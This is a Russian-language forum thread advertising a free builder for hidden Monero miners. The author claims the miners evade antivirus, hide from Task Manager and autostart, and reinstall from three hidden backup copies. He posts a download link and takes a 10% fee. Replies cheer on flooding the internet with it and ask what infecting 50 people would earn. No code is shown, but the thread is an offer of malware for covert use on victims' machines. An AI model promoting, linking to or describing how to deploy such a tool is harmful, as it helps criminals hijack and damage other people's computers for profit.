Реклама на SM Club

[БЕСПЛАТНО] СКРЫТЫЙ МАЙНЕР

Andrew7657656432865

БЫВАЛЫЙ
Регистрация
Сообщения
6
Реакции
0
Профиль пользователя не подтвержден! Работа с ним может быть не безопасна! Для подтверждения нужно быть зарегистрированным больше года или приобрести повышение прав.
Всем привет! Думаю все слышали о скрытых майнерах? Так вот, я создал билдер скрытых майнеров!

Скрытый майнер - бесплатно​

Майнеры созданные моим билдером не палятся антивирусами(Кроме Eset NOD 32) и при открытии диспетчера задач процесс майнера скрывается. Майнер не видно в автозагрузке. Он не требует админ-прав. И даже если вы нашли майнер и удалили его - он восстановится, ведь у него есть 3 резервные копии, которые разбросаны по самым дальним папкам. Майнер майнит Monero(XMR).
Вы спросите: "Какая тебе выгода от этого?"
Объясняю: если вы получили с майнера N Monero, а это равно, например, 10 000 рублей, то вы получите не 10 000, а 9 000 рублей, т.к. 10% я забираю себе, а 90% уже идут в ваш аккаунт MinerGate.
Ссылка на билдер: cloud.mail.ru/public/6bYw/Zhak294Th.
Желаю большого профита!

Полезные ссылки:
  1. Пуш скрипт сбор и рассылка.
  2. Бесплатно магазин скрипта для авто продаж.
 

Хамер

ЖУРНАЛИСТ
Vip
Подтвержденный
Регистрация
Сообщения
84
Реакции
130
Услуги Гаранта
3
Стоящая вещица, если этой дрянью заполонить интернет то будешь как Мавродий сидеть на золотой горе))

 

Andrew7657656432865

БЫВАЛЫЙ
Регистрация
Сообщения
6
Реакции
0
Профиль пользователя не подтвержден! Работа с ним может быть не безопасна! Для подтверждения нужно быть зарегистрированным больше года или приобрести повышение прав.
Авторизуйтесь для просмотра цитаты
Я на это и рассчитываю)) Думаю 10% - оптимальный вариант

 

Mops

БЫВАЛЫЙ
Регистрация
Сообщения
3
Реакции
0
Профиль пользователя не подтвержден! Работа с ним может быть не безопасна! Для подтверждения нужно быть зарегистрированным больше года или приобрести повышение прав.
А ты сам что ли эту прогу сделал? каким образом тебе отчисления идут?

 

Andrew7657656432865

БЫВАЛЫЙ
Регистрация
Сообщения
6
Реакции
0
Профиль пользователя не подтвержден! Работа с ним может быть не безопасна! Для подтверждения нужно быть зарегистрированным больше года или приобрести повышение прав.
Авторизуйтесь для просмотра цитаты
Да сделал сам. Часть отчислений идет в мой майнергейт

 

CHIR

БЫВАЛЫЙ
Регистрация
Сообщения
3
Реакции
0
Профиль пользователя не подтвержден! Работа с ним может быть не безопасна! Для подтверждения нужно быть зарегистрированным больше года или приобрести повышение прав.
А сколько можно зарабатывать в месяц если допустим закинуть 50 челам этот скрытый майнер? 

 

Andrew7657656432865

БЫВАЛЫЙ
Регистрация
Сообщения
6
Реакции
0
Профиль пользователя не подтвержден! Работа с ним может быть не безопасна! Для подтверждения нужно быть зарегистрированным больше года или приобрести повышение прав.
Авторизуйтесь для просмотра цитаты
10-50k, зависит от железа. В гайде об этом сказано.

 

Create an account or login to comment

Войдите или зарегистрируйтесь для ответа.
или

Создать новую учётную запись

Create an account on our community. It's easy!
Сверху Снизу